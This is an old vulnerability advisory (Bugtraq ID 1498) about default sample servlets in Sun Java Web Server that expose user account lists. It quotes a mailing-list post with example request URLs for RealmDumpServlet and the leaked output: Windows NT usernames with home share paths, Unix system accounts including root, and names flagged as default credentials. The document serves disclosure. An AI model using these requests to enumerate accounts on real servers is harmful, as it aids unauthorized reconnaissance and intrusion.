Default Sun Java Web Server Servlets Vulnerability

Bugtraq ID:	1498
Class:	Configuration Error
CVE:
Remote:	Yes
Local:	No
Published:	Jul 20 2000 12:00AM
Updated:	Jul 20 2000 12:00AM
Credit:	Discussed in a post entitled 'Sun Java Web Server Vulnerability' to [email protected] by [email protected] on Thu, 20 Jul 2000.
Vulnerable:	Sun Java Web Server 2.0 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Sun Solaris 2.5.1 _x86 - Sun Solaris 2.5.1 _ppc - Sun Solaris 2.5.1 - Sun Solaris 8_x86 - Sun Solaris 8_sparc - Sun Solaris 7.0_x86 - Sun Solaris 7.0 - Sun Solaris 2.6_x86HW5/98 - Sun Solaris 2.6_x86HW3/98 - Sun Solaris 2.6_x86 - Sun Solaris 2.6 HW5/98 - Sun Solaris 2.6 HW3/98 - Sun Solaris 2.6 - Sun Solaris 2.5_x86 - Sun Solaris 2.5 Sun Java Web Server 1.1.3 - Microsoft Windows NT 4.0 SP6 - Microsoft Windows NT 4.0 SP5 - Microsoft Windows NT 4.0 SP4 - Microsoft Windows NT 4.0 SP3 - Microsoft Windows NT 4.0 SP2 - Microsoft Windows NT 4.0 SP1 - Microsoft Windows NT 4.0 - Sun Solaris 2.5.1 _x86 - Sun Solaris 2.5.1 _ppc - Sun Solaris 2.5.1 - Sun Solaris 8_x86 - Sun Solaris 8_sparc - Sun Solaris 7.0_x86 - Sun Solaris 7.0 - Sun Solaris 2.6_x86HW5/98 - Sun Solaris 2.6_x86HW3/98 - Sun Solaris 2.6_x86 - Sun Solaris 2.6 HW5/98 - Sun Solaris 2.6 HW3/98 - Sun Solaris 2.6 - Sun Solaris 2.5_x86 - Sun Solaris 2.5
Not Vulnerable:

Default Sun Java Web Server Servlets Vulnerability

Examples from the post 'Sun Java Web Server Vulnerability' to [email protected] by [email protected]:

http://javawebserver.com/pservlet.html

User: sherwin

User: floorsoft

User: shaw

User: sears

User: beaulieu

User: diyonline

User: chicken

User: homedepot

User: abbey

User: goodhome

User: design1

User: 121312

User: buildnet

User: lowes

User: admin

User: emmitt

User: tms

User: ifloor

User: jeeves

^-------------------- default user / pass for web server

User: gerald

User: dixie

User: homeportfolio

User: buildscape

User: chuck

http://javawebserver/servlet/sunexamples.RealmDumpServlet

http://javawebserver:8080/servlet/sunexamples.RealmDumpServlet#Realm-NT



Individual Users:


User: brianw, home = \\aussie\home\brianw

User: chabell, home = \\aussie\home\chabell

User: davisons, home = \\aussie\home\davisons

User: exchadmin, home =

User: IUSR_AUSSIE, home =

User: IWAM_AUSSIE, home =

User: jd, home = \\aussie\home\jd

User: kkl, home = \\aussie\home\kkl

User: lisamh, home = \\aussie\home\lisamh

User: mattix, home = \\aussie\home\mattix

User: maxadmin, home = \\aussie\home\maxadmin

User: maxdev, home = \\aussie\home\maxdev

User: maxguest, home =

User: mcgreer, home = \\aussie\home\mcgreer

User: mdavis, home = \\aussie\home\mdavis

User: nbrathod, home = \\aussie\home\nbrathod

User: prnees, home = \\aussie\home\prnees

User: renee, home = \\aussie\home\renee

User: smcelder, home = \\aussie\home\smcelder

User: SQLAgentCmdExec, home = H:


http://javawebserver/servlet/sunexamples.RealmDumpServlet#Users-UNIX

Individual Users:


User: root, home = /

User: daemon, home = /

User: bin, home = /usr/bin

User: sys, home = /

User: adm, home = /var/adm

User: lp, home = /usr/spool/lp

User: uucp, home = /usr/lib/uucp

User: nuucp, home = /var/spool/uucppublic

User: listen, home = /usr/net/nls

User: nobody, home = /

User: noaccess, home = /

User: nobody4, home = /

User: mc, home = /space/u/mc

Default Sun Java Web Server Servlets Vulnerability

References: